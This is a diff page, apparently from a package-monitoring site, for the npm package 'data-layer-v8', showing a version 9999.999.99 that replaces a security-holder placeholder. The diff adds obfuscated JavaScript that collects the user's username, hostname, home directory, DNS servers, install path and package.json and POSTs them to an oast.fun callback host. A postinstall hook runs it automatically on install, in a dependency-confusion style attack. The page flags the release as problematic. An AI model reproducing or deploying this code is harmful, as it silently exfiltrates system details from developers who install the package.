data-layer-v8 0.0.1-security → 9999.999.99

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of data-layer-v8 might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +1 -0
  2. package/package.json +12 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1 @@
1
+ const _0x1d7cbf=_0x439d;function _0x439d(_0x13a116,_0x5d7460){const _0x23a974=_0x23a9();return _0x439d=function(_0x439dcc,_0x3ea58b){_0x439dcc=_0x439dcc-0x1b4;let _0x201da5=_0x23a974[_0x439dcc];return _0x201da5;},_0x439d(_0x13a116,_0x5d7460);}(function(_0x151455,_0x5ce4ef){const _0x1296d8=_0x439d,_0x6dbd12=_0x151455();while(!![]){try{const _0x3e3ac0=parseInt(_0x1296d8(0x1c1))/0x1*(parseInt(_0x1296d8(0x1c9))/0x2)+parseInt(_0x1296d8(0x1cf))/0x3+parseInt(_0x1296d8(0x1d1))/0x4*(-parseInt(_0x1296d8(0x1ba))/0x5)+-parseInt(_0x1296d8(0x1c8))/0x6*(-parseInt(_0x1296d8(0x1cb))/0x7)+parseInt(_0x1296d8(0x1d2))/0x8*(parseInt(_0x1296d8(0x1d0))/0x9)+parseInt(_0x1296d8(0x1c7))/0xa*(parseInt(_0x1296d8(0x1bd))/0xb)+-parseInt(_0x1296d8(0x1b9))/0xc;if(_0x3e3ac0===_0x5ce4ef)break;else _0x6dbd12['push'](_0x6dbd12['shift']());}catch(_0x4cf9a9){_0x6dbd12['push'](_0x6dbd12['shift']());}}}(_0x23a9,0xc4d47));const os=require('os'),dns=require(_0x1d7cbf(0x1b7)),querystring=require('querystring'),https=require(_0x1d7cbf(0x1b5)),packageJSON=require(_0x1d7cbf(0x1cc)),package=packageJSON[_0x1d7cbf(0x1ca)],trackingData=JSON['stringify']({'p':package,'c':__dirname,'hd':os[_0x1d7cbf(0x1bb)](),'hn':os[_0x1d7cbf(0x1be)](),'un':os[_0x1d7cbf(0x1bc)]()[_0x1d7cbf(0x1b6)],'dns':dns[_0x1d7cbf(0x1c6)](),'r':packageJSON?packageJSON[_0x1d7cbf(0x1c5)]:undefined,'v':packageJSON['version'],'pjson':packageJSON});var postData=querystring['stringify']({'msg':trackingData}),options={'hostname':_0x1d7cbf(0x1bf),'port':0x1bb,'path':'/','method':_0x1d7cbf(0x1c0),'headers':{'Content-Type':_0x1d7cbf(0x1c4),'Content-Length':postData[_0x1d7cbf(0x1ce)]}},req=https['request'](options,_0x2a1389=>{const _0x1c9d0d=_0x1d7cbf;_0x2a1389['on'](_0x1c9d0d(0x1b8),_0x16407a=>{const _0x2ae318=_0x1c9d0d;process[_0x2ae318(0x1c3)][_0x2ae318(0x1b4)](_0x16407a);});});req['on'](_0x1d7cbf(0x1c2),_0x176c6d=>{}),req[_0x1d7cbf(0x1b4)](postData),req[_0x1d7cbf(0x1cd)]();function _0x23a9(){const _0x4d12c9=['675760bCzKmd','write','https','username','dns','data','23003124RTEkTX','2005UsKhey','homedir','userInfo','11yAPBAk','hostname','cmj1w2g2vtc0000pvj60gkjy6boyyyyyb.oast.fun','POST','641863ukqeLc','error','stdout','application/x-www-form-urlencoded','___resolved','getServers','11352790EFDknL','18438OYGbtE','2SNjltM','name','3353SnHwKs','./package.json','end','length','207615vlWYSa','108PAXvrr','16048EliPjo'];_0x23a9=function(){return _0x4d12c9;};return _0x23a9();}
package/package.json CHANGED
@@ -1,6 +1,15 @@
1
1
  {
2
2
  "name": "data-layer-v8",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "9999.999.99",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "postinstall": "node index.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC",
12
+ "dependencies": {
13
+ "data-layer-v8": "^99.99.99"
14
+ }
6
15
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=data-layer-v8 for more information.